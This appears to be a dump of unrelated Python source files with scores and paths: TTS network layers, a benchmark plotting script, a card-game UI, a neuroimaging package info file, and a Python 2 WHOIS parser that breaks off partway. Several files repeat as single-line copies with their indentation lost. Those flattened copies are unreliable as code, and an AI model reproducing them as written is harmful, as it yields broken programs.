        torch.nn.init.xavier_uniform_(self.conv1d.weight, gain=gain)

    def forward(self, x):
        y = self.conv1d(x)
        if self.activation is not None:
            y = self.activation(y)
        return self.bn(y)


class Conv(nn.Module):
    """1-D convolution applied over (batch, time, channels) inputs.

    :param in_channels: dimension of input
    :param out_channels: dimension of output
    :param kernel_size: size of kernel
    :param stride: size of stride
    :param padding: size of padding
    :param dilation: dilation rate
    :param bias: boolean. if True, bias is included.
    :param w_init: str. weight inits with xavier initialization.
    """

    def __init__(self, in_channels, out_channels, kernel_size=1, stride=1,
                 padding=0, dilation=1, bias=True, w_init='linear'):
        super(Conv, self).__init__()
        self.conv = nn.Conv1d(in_channels, out_channels,
                              kernel_size=kernel_size, stride=stride,
                              padding=padding, dilation=dilation, bias=bias)
        nn.init.xavier_uniform_(self.conv.weight,
                                gain=nn.init.calculate_gain(w_init))

    def forward(self, x):
        # Channels-last in/out; nn.Conv1d wants channels-first internally.
        y = self.conv(x.contiguous().transpose(1, 2))
        return y.contiguous().transpose(1, 2)


class Linear(nn.Module):
    """nn.Linear wrapper with Xavier-uniform initialization.

    :param in_dim: dimension of input
    :param out_dim: dimension of output
    :param bias: boolean. if True, bias is included.
    :param w_init: str. weight inits with xavier initialization.
    """

    def __init__(self, in_dim, out_dim, bias=True, w_init='linear'):
        super(Linear, self).__init__()
        self.linear_layer = nn.Linear(in_dim, out_dim, bias=bias)
        nn.init.xavier_uniform_(self.linear_layer.weight,
                                gain=nn.init.calculate_gain(w_init))

    def forward(self, x):
        return self.linear_layer(x)


class Highway(nn.Module):
    """Highway layer: gated mix of a transform path and the identity path."""

    def __init__(self, in_size, out_size):
        super(Highway, self).__init__()
        self.H = nn.Linear(in_size, out_size)
        self.H.bias.data.zero_()
        self.T = nn.Linear(in_size, out_size)
        self.T.bias.data.fill_(-1)  # start biased toward the carry path
        self.relu = nn.ReLU()
        self.sigmoid = nn.Sigmoid()

    def forward(self, inputs):
        transform = self.relu(self.H(inputs))
        gate = self.sigmoid(self.T(inputs))
        return transform * gate + inputs * (1.0 - gate)


class Prenet(nn.Module):
    """Two Linear-ReLU-Dropout(0.5) stages applied before the network."""

    def __init__(self, input_size, hidden_size, output_size):
        super(Prenet, self).__init__()
        self.input_size = input_size
        self.output_size = output_size
        self.hidden_size = hidden_size
        stages = OrderedDict()
        stages['fc1'] = Linear(self.input_size, self.hidden_size)
        stages['relu1'] = nn.ReLU()
        stages['dropout1'] = nn.Dropout(0.5)
        stages['fc2'] = Linear(self.hidden_size, self.output_size)
        stages['relu2'] = nn.ReLU()
        stages['dropout2'] = nn.Dropout(0.5)
        self.layer = nn.Sequential(stages)

    def forward(self, x):
        return self.layer(x)


class CBHG(nn.Module):
    """CBHG: conv1d banks -> max-pool -> projections -> highways -> BiGRU."""

    def __init__(self, in_dim, K=16, projections=[128, 128]):
        super(CBHG, self).__init__()
        self.in_dim = in_dim
        self.relu = nn.ReLU()
        self.conv1d_banks = nn.ModuleList(
            [BatchNormConv1d(in_dim, in_dim, kernel_size=k, stride=1,
                             padding=k // 2, activation=self.relu)
             for k in range(1, K + 1)])
        self.max_pool1d = nn.MaxPool1d(kernel_size=2, stride=1, padding=1)
        in_sizes = [K * in_dim] + projections[:-1]
        activations = [self.relu] * (len(projections) - 1) + [None]
        self.conv1d_projections = nn.ModuleList(
            [BatchNormConv1d(i, o, kernel_size=3, stride=1, padding=1,
                             activation=a)
             for (i, o, a) in zip(in_sizes, projections, activations)])
        self.pre_highway = nn.Linear(projections[-1], in_dim, bias=False)
        self.highways = nn.ModuleList(
            [Highway(in_dim, in_dim) for _ in range(4)])
        self.gru = nn.GRU(in_dim, in_dim, 1, batch_first=True,
                          bidirectional=True)

    def forward(self, inputs, input_lengths=None):
        x = inputs  # (B, T_in, in_dim)
        if x.size(-1) == self.in_dim:
            x = x.transpose(1, 2)  # conv1d operates along the time axis
        T = x.size(-1)
        banked = [conv1d(x)[:, :, :T] for conv1d in self.conv1d_banks]
        x = torch.cat(banked, dim=1)  # (B, in_dim*K, T_in)
        assert x.size(1) == self.in_dim * len(self.conv1d_banks)
        x = self.max_pool1d(x)[:, :, :T]
        for conv1d in self.conv1d_projections:
            x = conv1d(x)
        x = x.transpose(1, 2)  # back to (B, T_in, ·)
        if x.size(-1) != self.in_dim:
            x = self.pre_highway(x)
        x += inputs  # residual connection
        for highway in self.highways:
            x = highway(x)
        if input_lengths is not None:
            x = nn.utils.rnn.pack_padded_sequence(x, input_lengths,
                                                  batch_first=True)
        self.gru.flatten_parameters()
        outputs, _ = self.gru(x)  # (B, T_in, in_dim*2)
        if input_lengths is not None:
            outputs, _ = nn.utils.rnn.pad_packed_sequence(outputs,
                                                          batch_first=True)
        return outputs


if __name__ == "__main__":
    # Smoke test for create_alignment and the expansion matmul.
    feats_a = torch.Tensor([[2, 3, 4], [1, 2, 3]])
    feats_b = torch.Tensor([[5, 6, 7], [7, 8, 9]])
    batch = torch.stack([feats_a, feats_b])
    durations = torch.Tensor([[1, 4], [6, 3]]).int()
    expand_max_len = torch.max(torch.sum(durations, -1), -1)[0]
    base = torch.zeros(batch.size(0), expand_max_len, batch.size(1))
    alignment = create_alignment(base.numpy(), durations.numpy())
    print(alignment)
    print(torch.from_numpy(alignment) @ batch)
0.914575
0.378057
import os import argparse import instrument_benchmark as bench from statistics import mean, stdev import numpy as np import matplotlib.pyplot as plt lout = None def lprint(message): print("{}".format(message)) if lout is not None: lout.write("{}\n".format(message)) def plot(x, y, yerr, label, fname): font = {'family': 'serif', 'color': 'darkblue', 'weight': 'bold', 'size': 16, } dpi = 100 fig = plt.figure(figsize=(1600 / dpi, 800 / dpi), dpi=dpi) ax = fig.add_subplot(111) plt.title(label) plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 0)) axes = plt.gca() _max = 1.25 * max([abs(y[i]) + abs(yerr[i]) for i in range(len(y))]) axes.set_ylim([-_max, _max]) axes.ticklabel_format(style='sci', axis='y', scilimits=(0, 0)) plt.errorbar(x, y, yerr=yerr, fmt='bD--', label=label) plt.xticks(rotation=-45, rotation_mode='anchor', **font) # zip joins x and y coordinates in pairs for _x, _y in zip(x, y): _label = "{:8.3e}".format(_y) plt.annotate(_label, (_x, _y), textcoords="offset points", xytext=(0, 10), ha='center', **font) box = ax.get_position() ax.set_position([box.x0, box.y0 + 0.15 * box.height, box.width, 0.85 * box.height]) plt.savefig(fname, dpi=75) # plt.show() def print_info(results, label, chunk_size=5, baseline=None): ntimes = len(results.timing()) nchunk = ntimes / chunk_size modulo = ntimes % chunk_size nitr = int(nchunk + 1 if modulo > 0 else nchunk) _time = "" _over = "" _inst = "" _ftime = results.timing() _finst = results.inst_count() _fover = results.overhead(baseline) for i in range(nitr): beg = i * chunk_size end = (i + 1) * chunk_size if end > ntimes: end = ntimes _rtime = _ftime[beg:end] _rover = _fover[beg:end] _rinst = _finst[beg:end] _t = ", ".join(["{:10.3e}".format(i) for i in _rtime]) _o = ", ".join(["{:10.3e}".format(i) for i in _rover]) _i = ", ".join(["{:10}".format(i) for i in _rinst]) if i == 0: _time = "{}".format(_t) _over = "{}".format(_o) _inst = "{}".format(_i) else: _time = "{}\n\t{:23}{}".format(_time, "", _t) _over = 
"{}\n\t{:23}{}".format(_over, "", _o) _inst = "{}\n\t{:23}{}".format(_inst, "", _i) _time = _time.strip("\n") _over = _over.strip("\n") _inst = _inst.strip("\n") lprint("\n{}:\n".format(label)) lprint("\t{:20} : {:10}".format("entries", results.entries())) lprint("") lprint("\t{:20} : {}".format("instrument (count)", _inst)) lprint("") lprint("\t{:20} : {}".format("runtime (sec)", _time)) lprint("") lprint("\t{:20} : {}".format("overhead (sec)", _over)) lprint("") lprint("\t{:20} : {:10.3e}".format("runtime (mean)", mean(_ftime))) lprint("\t{:20} : {:10.3e}".format("runtime (stdev)", stdev(_ftime))) lprint("\t{:20} : {:10.3e}".format("overhead (mean)", mean(_fover))) lprint("\t{:20} : {:10.3e}".format("overhead (stdev)", stdev(_fover))) return {"runtime": [mean(_ftime), stdev(_ftime)], "overhead": [mean(_fover), stdev(_fover)]} if __name__ == "__main__": submodules = sorted(bench.submodules) if len(submodules) == 0: raise RuntimeError("No submodules!") default_baseline = "baseline" if "baseline" in submodules else submodules[0] parser = argparse.ArgumentParser() parser.add_argument("-p", "--prefix", type=str, default="DISABLED") parser.add_argument("-m", "--modes", type=str, nargs='*', default=["fibonacci", "matrix"], choices=["fibonacci", "matrix"]) parser.add_argument("-l", "--languages", type=str, choices=["c", "cxx"], default=["c", "cxx"], nargs='*') parser.add_argument("-b", "--baseline", type=str, choices=submodules, default=default_baseline, required=False, help="Compute overhead w.r.t. 
to this submodule measurement") parser.add_argument("-i", "--iterations", type=int, default=50, help="Number of iterations per timing entry") # specific to MATMUL parser.add_argument("-n", "--size", type=int, default=100, help="Matrix size (N x N)") parser.add_argument("-e", "--entries", type=int, default=50, help="Number of timing entries") # specific to FIBONACCI parser.add_argument("-f", "--fibonacci", type=int, default=43, help="Fibonacci value") parser.add_argument("-c", "--cutoff", type=int, default=23, help="Fibonacci cutoff") args = parser.parse_args() # log file lout = open("{}.txt".format(args.prefix.strip('_')), 'w') m_N = args.size # matrix size is N x N m_I = args.iterations # number of iterations per timing entry m_E = args.entries # number of timing entries m_F = args.fibonacci # fibonacci value m_C = args.cutoff # cutoff value mtx_keys = [] fib_keys = [] mtx_time_data = {"y": [], "yerr": []} fib_time_data = {"y": [], "yerr": []} mtx_over_data = {"y": [], "yerr": []} fib_over_data = {"y": [], "yerr": []} # calculate the baseline first submodules.remove(args.baseline) submodules = [args.baseline] + submodules if "matrix" in args.modes: for lang in args.languages: baseline = None for submodule in submodules: key = "[{}]> {}_{}".format( lang.upper(), "MATMUL", submodule.upper()) lprint("Executing {}...".format(key)) ret = getattr(bench, submodule).matmul(m_N, m_E, m_I, lang) if ret is not None: if baseline is None: baseline = ret data = print_info(ret, key, baseline=baseline) lprint("") # spacing module = submodule.upper() mtx_keys += ["{}_MATMUL_{}".format(lang.upper(), module)] mtx_time_data["y"] += [data["runtime"][0]] mtx_over_data["y"] += [data["overhead"][0]] mtx_time_data["yerr"] += [data["runtime"][1]] mtx_over_data["yerr"] += [data["overhead"][1]] if len(mtx_keys) > 0: plot(mtx_keys, mtx_time_data["y"], mtx_time_data["yerr"], "Matrix Multiply ({} x {}) Runtime".format( m_N, m_N), "{}_MATMUL_RUNTIME.png".format(args.prefix.upper())) 
plot(mtx_keys, mtx_over_data["y"], mtx_over_data["yerr"], "Matrix Multiply ({} x {}) Overhead".format( m_N, m_N), "{}_MATMUL_OVERHEAD.png".format(args.prefix.upper())) if "fibonacci" in args.modes: for lang in args.languages: baseline = None for submodule in submodules: key = "[{}]> {}_{}".format( lang.upper(), "FIBONACCI", submodule.upper()) lprint("Executing {}...".format(key)) ret = getattr(bench, submodule).fibonacci(m_F, m_C, m_I, lang) if ret is not None: if baseline is None: baseline = ret data = print_info(ret, key, baseline=baseline) lprint("") # spacing module = submodule.upper() fib_keys += ["{}_FIB_{}".format(lang.upper(), module)] fib_time_data["y"] += [data["runtime"][0]] fib_over_data["y"] += [data["overhead"][0]] fib_time_data["yerr"] += [data["runtime"][1]] fib_over_data["yerr"] += [data["overhead"][1]] if len(fib_keys) > 0: plot(fib_keys, fib_time_data["y"], fib_time_data["yerr"], "Fibonacci({}, {}) Runtime".format( m_F, m_C), "{}_FIBONACCI_RUNTIME.png".format(args.prefix.upper().strip("_"))) plot(fib_keys, fib_over_data["y"], fib_over_data["yerr"], "Fibonacci({}, {}) Overhead".format( m_F, m_C), "{}_FIBONACCI_OVERHEAD.png".format(args.prefix.upper().strip("_"))) lout.close()
examples/execute.py
import os import argparse import instrument_benchmark as bench from statistics import mean, stdev import numpy as np import matplotlib.pyplot as plt lout = None def lprint(message): print("{}".format(message)) if lout is not None: lout.write("{}\n".format(message)) def plot(x, y, yerr, label, fname): font = {'family': 'serif', 'color': 'darkblue', 'weight': 'bold', 'size': 16, } dpi = 100 fig = plt.figure(figsize=(1600 / dpi, 800 / dpi), dpi=dpi) ax = fig.add_subplot(111) plt.title(label) plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 0)) axes = plt.gca() _max = 1.25 * max([abs(y[i]) + abs(yerr[i]) for i in range(len(y))]) axes.set_ylim([-_max, _max]) axes.ticklabel_format(style='sci', axis='y', scilimits=(0, 0)) plt.errorbar(x, y, yerr=yerr, fmt='bD--', label=label) plt.xticks(rotation=-45, rotation_mode='anchor', **font) # zip joins x and y coordinates in pairs for _x, _y in zip(x, y): _label = "{:8.3e}".format(_y) plt.annotate(_label, (_x, _y), textcoords="offset points", xytext=(0, 10), ha='center', **font) box = ax.get_position() ax.set_position([box.x0, box.y0 + 0.15 * box.height, box.width, 0.85 * box.height]) plt.savefig(fname, dpi=75) # plt.show() def print_info(results, label, chunk_size=5, baseline=None): ntimes = len(results.timing()) nchunk = ntimes / chunk_size modulo = ntimes % chunk_size nitr = int(nchunk + 1 if modulo > 0 else nchunk) _time = "" _over = "" _inst = "" _ftime = results.timing() _finst = results.inst_count() _fover = results.overhead(baseline) for i in range(nitr): beg = i * chunk_size end = (i + 1) * chunk_size if end > ntimes: end = ntimes _rtime = _ftime[beg:end] _rover = _fover[beg:end] _rinst = _finst[beg:end] _t = ", ".join(["{:10.3e}".format(i) for i in _rtime]) _o = ", ".join(["{:10.3e}".format(i) for i in _rover]) _i = ", ".join(["{:10}".format(i) for i in _rinst]) if i == 0: _time = "{}".format(_t) _over = "{}".format(_o) _inst = "{}".format(_i) else: _time = "{}\n\t{:23}{}".format(_time, "", _t) _over = 
"{}\n\t{:23}{}".format(_over, "", _o) _inst = "{}\n\t{:23}{}".format(_inst, "", _i) _time = _time.strip("\n") _over = _over.strip("\n") _inst = _inst.strip("\n") lprint("\n{}:\n".format(label)) lprint("\t{:20} : {:10}".format("entries", results.entries())) lprint("") lprint("\t{:20} : {}".format("instrument (count)", _inst)) lprint("") lprint("\t{:20} : {}".format("runtime (sec)", _time)) lprint("") lprint("\t{:20} : {}".format("overhead (sec)", _over)) lprint("") lprint("\t{:20} : {:10.3e}".format("runtime (mean)", mean(_ftime))) lprint("\t{:20} : {:10.3e}".format("runtime (stdev)", stdev(_ftime))) lprint("\t{:20} : {:10.3e}".format("overhead (mean)", mean(_fover))) lprint("\t{:20} : {:10.3e}".format("overhead (stdev)", stdev(_fover))) return {"runtime": [mean(_ftime), stdev(_ftime)], "overhead": [mean(_fover), stdev(_fover)]} if __name__ == "__main__": submodules = sorted(bench.submodules) if len(submodules) == 0: raise RuntimeError("No submodules!") default_baseline = "baseline" if "baseline" in submodules else submodules[0] parser = argparse.ArgumentParser() parser.add_argument("-p", "--prefix", type=str, default="DISABLED") parser.add_argument("-m", "--modes", type=str, nargs='*', default=["fibonacci", "matrix"], choices=["fibonacci", "matrix"]) parser.add_argument("-l", "--languages", type=str, choices=["c", "cxx"], default=["c", "cxx"], nargs='*') parser.add_argument("-b", "--baseline", type=str, choices=submodules, default=default_baseline, required=False, help="Compute overhead w.r.t. 
to this submodule measurement") parser.add_argument("-i", "--iterations", type=int, default=50, help="Number of iterations per timing entry") # specific to MATMUL parser.add_argument("-n", "--size", type=int, default=100, help="Matrix size (N x N)") parser.add_argument("-e", "--entries", type=int, default=50, help="Number of timing entries") # specific to FIBONACCI parser.add_argument("-f", "--fibonacci", type=int, default=43, help="Fibonacci value") parser.add_argument("-c", "--cutoff", type=int, default=23, help="Fibonacci cutoff") args = parser.parse_args() # log file lout = open("{}.txt".format(args.prefix.strip('_')), 'w') m_N = args.size # matrix size is N x N m_I = args.iterations # number of iterations per timing entry m_E = args.entries # number of timing entries m_F = args.fibonacci # fibonacci value m_C = args.cutoff # cutoff value mtx_keys = [] fib_keys = [] mtx_time_data = {"y": [], "yerr": []} fib_time_data = {"y": [], "yerr": []} mtx_over_data = {"y": [], "yerr": []} fib_over_data = {"y": [], "yerr": []} # calculate the baseline first submodules.remove(args.baseline) submodules = [args.baseline] + submodules if "matrix" in args.modes: for lang in args.languages: baseline = None for submodule in submodules: key = "[{}]> {}_{}".format( lang.upper(), "MATMUL", submodule.upper()) lprint("Executing {}...".format(key)) ret = getattr(bench, submodule).matmul(m_N, m_E, m_I, lang) if ret is not None: if baseline is None: baseline = ret data = print_info(ret, key, baseline=baseline) lprint("") # spacing module = submodule.upper() mtx_keys += ["{}_MATMUL_{}".format(lang.upper(), module)] mtx_time_data["y"] += [data["runtime"][0]] mtx_over_data["y"] += [data["overhead"][0]] mtx_time_data["yerr"] += [data["runtime"][1]] mtx_over_data["yerr"] += [data["overhead"][1]] if len(mtx_keys) > 0: plot(mtx_keys, mtx_time_data["y"], mtx_time_data["yerr"], "Matrix Multiply ({} x {}) Runtime".format( m_N, m_N), "{}_MATMUL_RUNTIME.png".format(args.prefix.upper())) 
plot(mtx_keys, mtx_over_data["y"], mtx_over_data["yerr"], "Matrix Multiply ({} x {}) Overhead".format( m_N, m_N), "{}_MATMUL_OVERHEAD.png".format(args.prefix.upper())) if "fibonacci" in args.modes: for lang in args.languages: baseline = None for submodule in submodules: key = "[{}]> {}_{}".format( lang.upper(), "FIBONACCI", submodule.upper()) lprint("Executing {}...".format(key)) ret = getattr(bench, submodule).fibonacci(m_F, m_C, m_I, lang) if ret is not None: if baseline is None: baseline = ret data = print_info(ret, key, baseline=baseline) lprint("") # spacing module = submodule.upper() fib_keys += ["{}_FIB_{}".format(lang.upper(), module)] fib_time_data["y"] += [data["runtime"][0]] fib_over_data["y"] += [data["overhead"][0]] fib_time_data["yerr"] += [data["runtime"][1]] fib_over_data["yerr"] += [data["overhead"][1]] if len(fib_keys) > 0: plot(fib_keys, fib_time_data["y"], fib_time_data["yerr"], "Fibonacci({}, {}) Runtime".format( m_F, m_C), "{}_FIBONACCI_RUNTIME.png".format(args.prefix.upper().strip("_"))) plot(fib_keys, fib_over_data["y"], fib_over_data["yerr"], "Fibonacci({}, {}) Overhead".format( m_F, m_C), "{}_FIBONACCI_OVERHEAD.png".format(args.prefix.upper().strip("_"))) lout.close()
0.409103
0.294722
from enum import Enum, auto from typing import Optional from shimmer.display.data_structures import Color from shimmer.display.alignment import ( HorizontalAlignment, VerticalAlignment, ) from shimmer.display.components.box import Box, BoxDefinition from shimmer.display.widgets.text_box import TextBoxDefinition, TextBox, LabelDefinition from ..backend.definitions import CardDefinition, CardPair class CardDisplay(Box): size = 100, 60 class CardFacingEnum(Enum): number = auto() action = auto() def __init__(self): super(CardDisplay, self).__init__( BoxDefinition( width=self.size[0], height=self.size[1], dynamic_size=False, background_color=Color(40, 40, 40), ) ) self.card: Optional[CardDefinition] = None self.text_box = TextBox(TextBoxDefinition(label=LabelDefinition("",),)) self.text_box.set_position_in_alignment_with( self, HorizontalAlignment.center, VerticalAlignment.center ) self.add(self.text_box) def set_card(self, card: CardDefinition, facing: CardFacingEnum) -> None: self.card = card if facing == self.CardFacingEnum.number: self.text_box.text = str(self.card.number) elif facing == self.CardFacingEnum.action: self.text_box.text = str(self.card.action.name) # And re-align the text within this Box. 
self.text_box.set_position_in_alignment_with( self, HorizontalAlignment.center, VerticalAlignment.center ) class CardPairDisplay(Box): def __init__(self): super(CardPairDisplay, self).__init__() self.card_pair: Optional[CardPair] = None self.number_card_display: CardDisplay = CardDisplay() self.number_card_display.position = 0, CardDisplay.size[1] + 10 self.action_card_display: CardDisplay = CardDisplay() self.add(self.number_card_display, z=-1) self.add(self.action_card_display, z=-1) child_boundary_rect = self.bounding_rect_of_children() # TODO don't use set size self._set_size( width=child_boundary_rect.width, height=child_boundary_rect.height ) def set_card_pair(self, card_pair: CardPair) -> None: self.card_pair = card_pair self.number_card_display.set_card( self.card_pair.number_card, facing=CardDisplay.CardFacingEnum.number ) self.action_card_display.set_card( self.card_pair.action_card, facing=CardDisplay.CardFacingEnum.action )
est8/frontend/card.py
from enum import Enum, auto from typing import Optional from shimmer.display.data_structures import Color from shimmer.display.alignment import ( HorizontalAlignment, VerticalAlignment, ) from shimmer.display.components.box import Box, BoxDefinition from shimmer.display.widgets.text_box import TextBoxDefinition, TextBox, LabelDefinition from ..backend.definitions import CardDefinition, CardPair class CardDisplay(Box): size = 100, 60 class CardFacingEnum(Enum): number = auto() action = auto() def __init__(self): super(CardDisplay, self).__init__( BoxDefinition( width=self.size[0], height=self.size[1], dynamic_size=False, background_color=Color(40, 40, 40), ) ) self.card: Optional[CardDefinition] = None self.text_box = TextBox(TextBoxDefinition(label=LabelDefinition("",),)) self.text_box.set_position_in_alignment_with( self, HorizontalAlignment.center, VerticalAlignment.center ) self.add(self.text_box) def set_card(self, card: CardDefinition, facing: CardFacingEnum) -> None: self.card = card if facing == self.CardFacingEnum.number: self.text_box.text = str(self.card.number) elif facing == self.CardFacingEnum.action: self.text_box.text = str(self.card.action.name) # And re-align the text within this Box. 
self.text_box.set_position_in_alignment_with( self, HorizontalAlignment.center, VerticalAlignment.center ) class CardPairDisplay(Box): def __init__(self): super(CardPairDisplay, self).__init__() self.card_pair: Optional[CardPair] = None self.number_card_display: CardDisplay = CardDisplay() self.number_card_display.position = 0, CardDisplay.size[1] + 10 self.action_card_display: CardDisplay = CardDisplay() self.add(self.number_card_display, z=-1) self.add(self.action_card_display, z=-1) child_boundary_rect = self.bounding_rect_of_children() # TODO don't use set size self._set_size( width=child_boundary_rect.width, height=child_boundary_rect.height ) def set_card_pair(self, card_pair: CardPair) -> None: self.card_pair = card_pair self.number_card_display.set_card( self.card_pair.number_card, facing=CardDisplay.CardFacingEnum.number ) self.action_card_display.set_card( self.card_pair.action_card, facing=CardDisplay.CardFacingEnum.action )
0.753739
0.109658
_version_major = 0 _version_minor = 1 _version_micro = 0 _version_extra = '.dev' def get_nipype_gitversion(): """Nipype version as reported by the last commit in git Returns ------- None or str Version of NiPype according to git. """ import os import subprocess try: import bips gitpath = os.path.realpath(os.path.join(os.path.dirname(bips.__file__), os.path.pardir)) except: gitpath = os.getcwd() gitpathgit = os.path.join(gitpath, '.git') if not os.path.exists(gitpathgit): return None ver = None try: o, _ = subprocess.Popen('git describe', shell=True, cwd=gitpath, stdout=subprocess.PIPE).communicate() except Exception: pass else: ver = o.strip().split('-')[-1] return ver if '.dev' in _version_extra: gitversion = get_nipype_gitversion() if gitversion: _version_extra = '.' + gitversion + '-' + 'dev' # Format expected by setup.py and doc/source/conf.py: string of form "X.Y.Z" __version__ = "%s.%s.%s%s" % (_version_major, _version_minor, _version_micro, _version_extra) CLASSIFIERS = ["Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Science/Research", "License :: OSI Approved :: BSD License", "Operating System :: OS Independent", "Programming Language :: Python", "Topic :: Scientific/Engineering"] description = 'Neuroimaging in Python: Pipelines and Interfaces' # Note: this long_description is actually a copy/paste from the top-level # README.rst.txt, so that it shows up nicely on PyPI. So please remember to edit # it only in one place and sync it correctly. long_description = \ """ ============================= BIPS: Brain Imaging Pipelines ============================= The goal of BIPS is to present a set of brain imaging workflows for analysis of diffusion, structural and functional mri data. 
""" # requirement versions NIPYPE_MIN_VERSION = '0.5.3' NAME = 'bips' MAINTAINER = "bips developers" MAINTAINER_EMAIL = "<EMAIL>, <EMAIL>" DESCRIPTION = description LONG_DESCRIPTION = long_description URL = "http://bips.incf.org" DOWNLOAD_URL = "http://github.com/INCF/BrainImagingPipelines/archives/master" LICENSE = "Apache 2.0" CLASSIFIERS = CLASSIFIERS AUTHOR = "bips developmers" AUTHOR_EMAIL = "<EMAIL>, <EMAIL>" PLATFORMS = "OS Independent" MAJOR = _version_major MINOR = _version_minor MICRO = _version_micro ISRELEASE = _version_extra == '' VERSION = __version__ REQUIRES = ["nipype (>=0.5.3)"] STATUS = 'beta'
bips/info.py
_version_major = 0 _version_minor = 1 _version_micro = 0 _version_extra = '.dev' def get_nipype_gitversion(): """Nipype version as reported by the last commit in git Returns ------- None or str Version of NiPype according to git. """ import os import subprocess try: import bips gitpath = os.path.realpath(os.path.join(os.path.dirname(bips.__file__), os.path.pardir)) except: gitpath = os.getcwd() gitpathgit = os.path.join(gitpath, '.git') if not os.path.exists(gitpathgit): return None ver = None try: o, _ = subprocess.Popen('git describe', shell=True, cwd=gitpath, stdout=subprocess.PIPE).communicate() except Exception: pass else: ver = o.strip().split('-')[-1] return ver if '.dev' in _version_extra: gitversion = get_nipype_gitversion() if gitversion: _version_extra = '.' + gitversion + '-' + 'dev' # Format expected by setup.py and doc/source/conf.py: string of form "X.Y.Z" __version__ = "%s.%s.%s%s" % (_version_major, _version_minor, _version_micro, _version_extra) CLASSIFIERS = ["Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Science/Research", "License :: OSI Approved :: BSD License", "Operating System :: OS Independent", "Programming Language :: Python", "Topic :: Scientific/Engineering"] description = 'Neuroimaging in Python: Pipelines and Interfaces' # Note: this long_description is actually a copy/paste from the top-level # README.rst.txt, so that it shows up nicely on PyPI. So please remember to edit # it only in one place and sync it correctly. long_description = \ """ ============================= BIPS: Brain Imaging Pipelines ============================= The goal of BIPS is to present a set of brain imaging workflows for analysis of diffusion, structural and functional mri data. 
""" # requirement versions NIPYPE_MIN_VERSION = '0.5.3' NAME = 'bips' MAINTAINER = "bips developers" MAINTAINER_EMAIL = "<EMAIL>, <EMAIL>" DESCRIPTION = description LONG_DESCRIPTION = long_description URL = "http://bips.incf.org" DOWNLOAD_URL = "http://github.com/INCF/BrainImagingPipelines/archives/master" LICENSE = "Apache 2.0" CLASSIFIERS = CLASSIFIERS AUTHOR = "bips developmers" AUTHOR_EMAIL = "<EMAIL>, <EMAIL>" PLATFORMS = "OS Independent" MAJOR = _version_major MINOR = _version_minor MICRO = _version_micro ISRELEASE = _version_extra == '' VERSION = __version__ REQUIRES = ["nipype (>=0.5.3)"] STATUS = 'beta'
0.497315
0.184768
import re import pytz import copy from dateutil.parser import parse import WHOIS_parser from WHOIS_connect import WHOIS_srv_connect utc_timezone = pytz.utc # 设置utc时区 CHOSE_WHOIS_server = WHOIS_parser.WHOIS_info_extract_func() WHOIS_RECORD = { "domain": "", # 域名 "tld": "", # 顶级域 "flag": "", # 状态标记 "domain_status": "", # 域名状态 "sponsoring_registrar": "", # 注册商 "top_whois_server": "", # 顶级域名服务器 "sec_whois_server": "", # 二级域名服务器 "reg_name": "", # 注册姓名 "reg_phone": "", # 注册电话 "reg_email": "", # 注册email "org_name": "", # 注册公司名称 "creation_date": "", # 创建时间 "expiration_date": "", # 到期时间 "updated_date": "", # 更新时间 "details": "", # 原始信息(一级WHOIS信息 + 二级WHOIS信息) "top_whois_detail": "", # 一级WHOIS信息 "sec_whois_detail": "", # 二级WHOIS信息 "name_server": "", # 域名服务器 } # WHOIS 数据标记位 FLAG_CANT_DEAL = 0 # 不能处理 FLAG_OK = 1 # 正常 FLAG_NO_WHOIS_ADDR = -1 # 未找到WHOIS服务器 FLAG_TOP_WHOIS_FAILED = -2 # 一级WHOIS获取错误 FLAG_NO_SEC_WHOI_ADDR = -3 # 未找到二级WHOIS服务器 FLAG_SEC_WHOIS_FAILED = -4 # 二级WHOIS获取错误 FLAG_EMPTY_WHOIS_INFO = -5 # WHOIS信息为空 FLAG_INFO_EXTRACT_FAILED = -6 # WHOIS关键信息解析失败 # 状态值字典 WHOIS_STATUS_DICT = { # EPP "ADDPERIOD": "1", "AUTORENEWPERIOD": "2", "INACTIVE": "3", "OK": "4", "PENDINGCREATE": "5", "PENDINGDELETE": "6", "PENDINGRENEW": "7", "PENDINGRESTORE": "8", "PENDINGTRANSFER": "9", "PENDINGUPDATE": "10", "REDEMPTIONPERIOD": "11", "RENEWPERIOD": "12", "SERVERDELETEPROHIBITED": "13", "SERVERHOLD": "14", "SERVERRENEWPROHIBITED": "15", "SERVERTRANSFERPROHIBITED": "16", "SERVERUPDATEPROHIBITED": "17", "TRANSFERPERIOD": "18", "CLIENTDELETEPROHIBITED": "19", "CLIENTHOLD": "20", "CLIENTRENEWPROHIBITED": "21", "CLIENTTRANSFERPROHIBITED": "22", "CLIENTUPDATEPROHIBITED": "23", # RRP "ACTIVE": "24", "REGISTRYLOCK": "25", "REGISTRARLOCK": "26", "REGISTRYHOLD": "27", "REGISTRARHOLD": "28", # "REDEMPTIONPERIOD": "29", 重复 # "PENDINGRESTORE": "30", 重复 # "PENDINGDELETE": "31", 重复 "NOTEXIST": "29", # 域名不存在 "NOSTATUS": "30", # 无状态值 "CONNECT": "31", # de服务器状态 } def format_timestamp(str_time): 
"""将时间字符串进行标准化处理""" try: time_parse = parse(str_time) # 解析日期为datetime型 except ValueError, e: return str_time try: time_parse = time_parse.astimezone(tz=utc_timezone) # 有时区转换为北京时间 except ValueError, e: time_parse = utc_timezone.localize(time_parse) # 无时区转换为localtime,即北京时间 D, T = str(time_parse).split(" ", 1) return D + " " + T[:8] def get_status_value(status_str): """ 将域名状态字符串转换成状态值 :param status_str: 域名状态字符串 :return: 状态值[若无状态则默认为30(NOSTATUS), 非标准状态值只变成大写""" global WHOIS_STATUS_DICT status_return = "" if status_str == "": return "30" infos = status_unite(status_str).split(";") for status in infos: status_value = WHOIS_STATUS_DICT.get(status, "0") if status_value == "0": status_value = status status_return += status_value status_return += ";" return status_return.strip(";") def status_unite(status): """状态字符串格式处理""" while status.find(" ") != -1: status = status.replace(" ", ";") while status.find("-") != -1: status = status.replace("-", ";") return status.upper() def is_xxx_exist(data): """用来判断com_manage函数中,得到的whois信息是否包含xxx标志,若包括则需要重新发送""" if data.find("\"xxx\"") != -1 and data.find("\"=xxx\"") != -1: return True else: return False def extract_sec_server(data, domain): """提取原始whois信息中的,二级whois服务器""" if not data: return False if data.find("Domain Name: %s" % domain.upper()) != -1: pos = data.find("Domain Name: %s" % domain.upper()) data = data[pos:] pattern = re.compile(r"Whois 